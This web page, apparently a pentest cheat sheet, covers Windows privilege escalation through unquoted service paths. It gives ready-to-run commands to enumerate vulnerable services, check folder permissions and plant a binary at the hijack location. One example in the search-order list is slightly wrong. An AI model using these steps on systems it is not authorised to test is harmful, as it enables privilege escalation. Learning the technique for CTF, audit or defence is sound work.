>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / Unquoted Service Paths

Unquoted Service Paths

Privilege Escalation Windows Services windows

Identify vulnerable services

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

If a path contains spaces and is not quoted, e.g. C:\Program Files\My Program\service.exe, Windows will try in order:

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe

Check binary permissions

icacls "C:\Program Files (x86)\UNQUOTED_SERVICE_PATH_SOFTWARE"

Exploitation

If a vulnerable parent directory is writable, plant your binary at the hijack location:

move sirenMaint.exe "C:\Program Files\something\Program.exe"

Bulk enumeration with cacls

cd C:\Windows\TEMP
sc query state= all | findstr "SERVICE_NAME:" >> ServiceNames.txt
FOR /F "tokens=2 delims= " %i in (ServiceNames.txt) DO @echo %i >> Services.txt
FOR /F %i in (Services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
type path.txt